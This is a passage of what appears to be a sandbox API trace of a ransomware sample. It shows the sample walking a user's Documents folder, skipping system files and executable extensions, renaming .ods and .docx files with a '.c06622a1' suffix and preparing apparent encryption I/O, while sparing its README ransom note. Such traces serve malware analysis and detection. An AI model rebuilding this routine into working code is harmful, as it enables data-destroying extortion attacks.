(_Str1="ps1", _Str2="ods") returned 1 [0158.442] wcslen (_String="ps1") returned 0x3 [0158.442] _wcsicmp (_Str1="rom", _Str2="ods") returned 3 [0158.443] wcslen (_String="rom") returned 0x3 [0158.443] _wcsicmp (_Str1="rtp", _Str2="ods") returned 3 [0158.443] wcslen (_String="rtp") returned 0x3 [0158.443] _wcsicmp (_Str1="scr", _Str2="ods") returned 4 [0158.443] wcslen (_String="scr") returned 0x3 [0158.443] _wcsicmp (_Str1="shs", _Str2="ods") returned 4 [0158.443] wcslen (_String="shs") returned 0x3 [0158.443] _wcsicmp (_Str1="spl", _Str2="ods") returned 4 [0158.443] wcslen (_String="spl") returned 0x3 [0158.443] _wcsicmp (_Str1="sys", _Str2="ods") returned 4 [0158.443] wcslen (_String="sys") returned 0x3 [0158.443] _wcsicmp (_Str1="theme", _Str2="ods") returned 5 [0158.443] wcslen (_String="theme") returned 0x5 [0158.443] _wcsicmp (_Str1="themepack", _Str2="ods") returned 5 [0158.443] wcslen (_String="themepack") returned 0x9 [0158.443] _wcsicmp (_Str1="wpx", _Str2="ods") returned 8 [0158.443] wcslen (_String="wpx") returned 0x3 [0158.443] _wcsicmp (_Str1="lock", _Str2="ods") returned -3 [0158.443] wcslen (_String="lock") returned 0x4 [0158.443] _wcsicmp (_Str1="key", _Str2="ods") returned -4 [0158.443] wcslen (_String="key") returned 0x3 [0158.443] _wcsicmp (_Str1="hta", _Str2="ods") returned -7 [0158.443] wcslen (_String="hta") returned 0x3 [0158.443] _wcsicmp (_Str1="msi", _Str2="ods") returned -2 [0158.443] wcslen (_String="msi") returned 0x3 [0158.443] _wcsicmp (_Str1="pdb", _Str2="ods") returned 1 [0158.443] wcslen (_String="pdb") returned 0x3 [0158.443] _wcsicmp (_Str1="sqlite", _Str2="ods") returned 4 [0158.443] wcslen (_String="sqlite") returned 0x6 [0158.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm")) returned 0x10 [0158.443] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.444] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" [0158.444] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm") returned 0x53 [0158.444] wcscpy (in: _Dest=0x32a0138, _Source="3-UD.ods" | out: _Dest="3-UD.ods") returned="3-UD.ods" [0158.444] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\3-UD.ods", dwFileAttributes=0x80) returned 1 [0158.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\3-UD.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\3-ud.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0158.444] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.444] ReadFile (in: hFile=0x1c8, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.445] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0xddf01e05 [0158.445] RtlComputeCrc32 (PartialCrc=0x1e05, Buffer=0x32e4a4, Length=0x80) returned 0x5f763ea8 [0158.445] RtlComputeCrc32 (PartialCrc=0x3ea8, Buffer=0x32e4a4, Length=0x80) returned 0x670b2aa4 [0158.445] RtlComputeCrc32 (PartialCrc=0x2aa4, Buffer=0x32e4a4, Length=0x80) returned 0x48a9c9df [0158.445] RtlComputeCrc32 (PartialCrc=0xc9df, Buffer=0x32e4a4, Length=0x80) returned 0x936daf60 [0158.445] CloseHandle (hObject=0x1c8) returned 1 [0158.445] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.445] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\3-UD.ods" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\3-UD.ods") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\3-UD.ods" [0158.445] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\3-UD.ods") returned 0x5c [0158.445] wcscpy (in: _Dest=0x32b0150, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.445] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\3-UD.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\3-ud.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\3-UD.ods.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\3-ud.ods.c06622a1"), dwFlags=0x8) returned 1 [0158.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\3-UD.ods.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\3-ud.ods.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0158.448] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.448] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x37e0020 [0158.455] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x12b592a0 [0158.455] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4691855 [0158.455] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a85ec0 [0158.455] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76e291d8 [0158.455] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1336843e [0158.455] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x213c86a6 [0158.455] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x402827b9 [0158.455] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x58670923 [0158.458] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x37e0094, Length=0x80) returned 0x49349a03 [0158.458] RtlComputeCrc32 (PartialCrc=0x9a03, Buffer=0x37e0094, Length=0x80) returned 0x50c37dc6 [0158.458] RtlComputeCrc32 (PartialCrc=0x7dc6, Buffer=0x37e0094, Length=0x80) returned 0x7f9394a3 [0158.458] RtlComputeCrc32 (PartialCrc=0x94a3, Buffer=0x37e0094, Length=0x80) returned 0xee83e61 [0158.458] RtlComputeCrc32 (PartialCrc=0x3e61, Buffer=0x37e0094, Length=0x80) returned 0xbaa31c43 [0158.458] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0158.458] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.458] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.458] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44350b0, ftCreationTime.dwHighDateTime=0x1d5da10, ftLastAccessTime.dwLowDateTime=0x484a0c80, ftLastAccessTime.dwHighDateTime=0x1d5e41b, ftLastWriteTime.dwLowDateTime=0x484a0c80, ftLastWriteTime.dwHighDateTime=0x1d5e41b, nFileSizeHigh=0x0, nFileSizeLow=0x13e8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="HRjqto7px58xuzy.docx", cAlternateFileName="HRJQTO~1.DOC")) returned 1 [0158.458] _wcsicmp (_Str1="HRjqto7px58xuzy.docx", _Str2="README.c06622a1.TXT") returned -10 [0158.458] wcsstr (_Str="HRjqto7px58xuzy.docx", _SubStr="README") returned 0x0 [0158.458] _wcsicmp (_Str1="autorun.inf", _Str2="HRjqto7px58xuzy.docx") returned -7 [0158.458] wcslen (_String="autorun.inf") returned 0xb [0158.458] _wcsicmp (_Str1="boot.ini", _Str2="HRjqto7px58xuzy.docx") returned -6 [0158.458] wcslen (_String="boot.ini") returned 0x8 [0158.458] _wcsicmp (_Str1="bootfont.bin", _Str2="HRjqto7px58xuzy.docx") returned -6 [0158.458] wcslen (_String="bootfont.bin") returned 0xc [0158.458] _wcsicmp (_Str1="bootsect.bak", _Str2="HRjqto7px58xuzy.docx") returned -6 [0158.458] wcslen (_String="bootsect.bak") returned 0xc [0158.458] _wcsicmp (_Str1="desktop.ini", _Str2="HRjqto7px58xuzy.docx") returned -4 [0158.458] wcslen (_String="desktop.ini") returned 0xb [0158.458] _wcsicmp (_Str1="iconcache.db", _Str2="HRjqto7px58xuzy.docx") returned 1 [0158.458] wcslen (_String="iconcache.db") returned 0xc [0158.459] _wcsicmp (_Str1="ntldr", _Str2="HRjqto7px58xuzy.docx") returned 6 [0158.459] wcslen (_String="ntldr") returned 0x5 [0158.459] _wcsicmp (_Str1="ntuser.dat", _Str2="HRjqto7px58xuzy.docx") returned 6 [0158.459] wcslen (_String="ntuser.dat") returned 0xa [0158.459] _wcsicmp (_Str1="ntuser.dat.log", _Str2="HRjqto7px58xuzy.docx") returned 6 [0158.459] wcslen (_String="ntuser.dat.log") returned 0xe [0158.459] _wcsicmp (_Str1="ntuser.ini", _Str2="HRjqto7px58xuzy.docx") returned 6 [0158.459] wcslen (_String="ntuser.ini") returned 0xa [0158.459] _wcsicmp (_Str1="thumbs.db", _Str2="HRjqto7px58xuzy.docx") returned 12 [0158.459] wcslen (_String="thumbs.db") returned 0x9 [0158.459] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0158.459] wcslen (_String="386") returned 0x3 [0158.459] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0158.459] wcslen (_String="adv") returned 0x3 [0158.459] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0158.459] wcslen (_String="ani") returned 0x3 [0158.459] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0158.459] wcslen (_String="bat") returned 0x3 [0158.459] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0158.459] wcslen (_String="bin") returned 0x3 [0158.459] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0158.459] wcslen (_String="cab") returned 0x3 [0158.459] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0158.459] wcslen (_String="cmd") returned 0x3 [0158.459] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0158.459] wcslen (_String="com") returned 0x3 [0158.459] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0158.459] wcslen (_String="cpl") returned 0x3 [0158.459] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0158.459] wcslen (_String="cur") returned 0x3 [0158.459] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0158.459] wcslen (_String="deskthemepack") returned 0xd [0158.459] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0158.459] wcslen (_String="diagcab") returned 0x7 [0158.459] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0158.459] wcslen (_String="diagcfg") returned 0x7 [0158.459] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0158.460] wcslen (_String="diagpkg") returned 0x7 [0158.460] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0158.460] wcslen (_String="dll") returned 0x3 [0158.460] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0158.460] wcslen (_String="drv") returned 0x3 [0158.460] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0158.460] wcslen (_String="exe") returned 0x3 [0158.460] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0158.460] wcslen (_String="hlp") returned 0x3 [0158.460] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0158.460] wcslen (_String="icl") returned 0x3 [0158.460] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0158.460] wcslen (_String="icns") returned 0x4 [0158.460] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0158.460] wcslen (_String="ico") returned 0x3 [0158.460] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0158.460] wcslen (_String="ics") returned 0x3 [0158.460] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0158.460] wcslen (_String="idx") returned 0x3 [0158.460] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0158.460] wcslen (_String="ldf") returned 0x3 [0158.460] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0158.460] wcslen (_String="lnk") returned 0x3 [0158.460] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0158.460] wcslen (_String="mod") returned 0x3 [0158.460] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0158.460] wcslen (_String="mpa") returned 0x3 [0158.460] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0158.460] wcslen (_String="msc") returned 0x3 [0158.460] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0158.460] wcslen (_String="msp") returned 0x3 [0158.460] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0158.460] wcslen (_String="msstyles") returned 0x8 [0158.460] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0158.461] wcslen (_String="msu") returned 0x3 [0158.461] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0158.461] wcslen (_String="nls") returned 0x3 [0158.461] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0158.461] wcslen (_String="nomedia") returned 0x7 [0158.461] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0158.461] wcslen (_String="ocx") returned 0x3 [0158.461] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0158.461] wcslen (_String="prf") returned 0x3 [0158.461] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0158.461] wcslen (_String="ps1") returned 0x3 [0158.461] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0158.461] wcslen (_String="rom") returned 0x3 [0158.461] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0158.461] wcslen (_String="rtp") returned 0x3 [0158.461] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0158.461] wcslen (_String="scr") returned 0x3 [0158.461] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0158.461] wcslen (_String="shs") returned 0x3 [0158.461] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0158.461] wcslen (_String="spl") returned 0x3 [0158.461] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0158.461] wcslen (_String="sys") returned 0x3 [0158.461] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0158.461] wcslen (_String="theme") returned 0x5 [0158.461] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0158.461] wcslen (_String="themepack") returned 0x9 [0158.461] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0158.461] wcslen (_String="wpx") returned 0x3 [0158.461] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0158.461] wcslen (_String="lock") returned 0x4 [0158.461] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0158.461] wcslen (_String="key") returned 0x3 [0158.461] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0158.461] wcslen (_String="hta") returned 0x3 [0158.462] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0158.462] wcslen (_String="msi") returned 0x3 [0158.462] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0158.462] wcslen (_String="pdb") returned 0x3 [0158.462] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0158.462] wcslen (_String="sqlite") returned 0x6 [0158.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm")) returned 0x10 [0158.462] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.462] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" [0158.462] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm") returned 0x53 [0158.462] wcscpy (in: _Dest=0x32a0138, _Source="HRjqto7px58xuzy.docx" | out: _Dest="HRjqto7px58xuzy.docx") returned="HRjqto7px58xuzy.docx" [0158.462] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\HRjqto7px58xuzy.docx", dwFileAttributes=0x80) returned 1 [0158.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\HRjqto7px58xuzy.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\hrjqto7px58xuzy.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0158.462] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.462] ReadFile (in: hFile=0x1d4, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.463] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x643ae6ef [0158.463] RtlComputeCrc32 (PartialCrc=0xe6ef, Buffer=0x32e4a4, Length=0x80) returned 0x192a7953 [0158.463] RtlComputeCrc32 (PartialCrc=0x7953, Buffer=0x32e4a4, Length=0x80) returned 0xa7551ee2 [0158.463] RtlComputeCrc32 (PartialCrc=0x1ee2, Buffer=0x32e4a4, Length=0x80) returned 0xf8f7203c [0158.463] RtlComputeCrc32 (PartialCrc=0x203c, Buffer=0x32e4a4, Length=0x80) returned 0xed6f3d58 [0158.463] CloseHandle (hObject=0x1d4) returned 1 [0158.463] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.463] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\HRjqto7px58xuzy.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\HRjqto7px58xuzy.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\HRjqto7px58xuzy.docx" [0158.463] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\HRjqto7px58xuzy.docx") returned 0x68 [0158.463] wcscpy (in: _Dest=0x32b0168, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.464] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\HRjqto7px58xuzy.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\hrjqto7px58xuzy.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\HRjqto7px58xuzy.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\hrjqto7px58xuzy.docx.c06622a1"), dwFlags=0x8) returned 1 [0158.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\HRjqto7px58xuzy.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\hrjqto7px58xuzy.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d4 [0158.466] CreateIoCompletionPort (FileHandle=0x1d4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.466] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3870020 [0158.472] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ba50 [0158.472] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f1d60d6 [0158.472] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ad4c7f5 [0158.472] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54441515 [0158.472] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x48cac8c9 [0158.472] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2f76a13e [0158.472] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f6e9234 [0158.472] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4ee4b252 [0158.475] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3870094, Length=0x80) returned 0xd8f6476b [0158.476] RtlComputeCrc32 (PartialCrc=0x476b, Buffer=0x3870094, Length=0x80) returned 0xd00cdd48 [0158.476] RtlComputeCrc32 (PartialCrc=0xdd48, Buffer=0x3870094, Length=0x80) returned 0xb5c63c85 [0158.476] RtlComputeCrc32 (PartialCrc=0x3c85, Buffer=0x3870094, Length=0x80) returned 0xc6cc72bb [0158.476] RtlComputeCrc32 (PartialCrc=0x72bb, Buffer=0x3870094, Length=0x80) returned 0xc979ac15 [0158.476] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0158.476] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.476] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.476] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c222f60, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8c222f60, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c222f60, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0158.476] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0158.476] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46e12540, ftCreationTime.dwHighDateTime=0x1d5db29, ftLastAccessTime.dwLowDateTime=0xb6026280, ftLastAccessTime.dwHighDateTime=0x1d5dfb2, ftLastWriteTime.dwLowDateTime=0xb6026280, ftLastWriteTime.dwHighDateTime=0x1d5dfb2, nFileSizeHigh=0x0, nFileSizeLow=0x8c51, dwReserved0=0x0, dwReserved1=0x0, cFileName="rL-yOwn0ZZgZddUS.pptx", cAlternateFileName="RL-YOW~1.PPT")) returned 1 [0158.476] _wcsicmp (_Str1="rL-yOwn0ZZgZddUS.pptx", _Str2="README.c06622a1.TXT") returned 7 [0158.476] wcsstr (_Str="rL-yOwn0ZZgZddUS.pptx", _SubStr="README") returned 0x0 [0158.476] _wcsicmp (_Str1="autorun.inf", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -17 [0158.476] wcslen (_String="autorun.inf") returned 0xb [0158.476] _wcsicmp (_Str1="boot.ini", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -16 [0158.476] wcslen (_String="boot.ini") returned 0x8 [0158.476] _wcsicmp (_Str1="bootfont.bin", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -16 [0158.476] wcslen (_String="bootfont.bin") returned 0xc [0158.476] _wcsicmp (_Str1="bootsect.bak", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -16 [0158.476] wcslen (_String="bootsect.bak") returned 0xc [0158.476] _wcsicmp (_Str1="desktop.ini", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -14 [0158.476] wcslen (_String="desktop.ini") returned 0xb [0158.476] _wcsicmp (_Str1="iconcache.db", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -9 [0158.476] wcslen (_String="iconcache.db") returned 0xc [0158.476] _wcsicmp (_Str1="ntldr", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -4 [0158.476] wcslen (_String="ntldr") returned 0x5 [0158.476] _wcsicmp (_Str1="ntuser.dat", _Str2="rL-yOwn0ZZgZddUS.pptx") returned -4 [0158.476] wcslen (_String="ntuser.dat") returned 0xa [0158.476] _wcsicmp 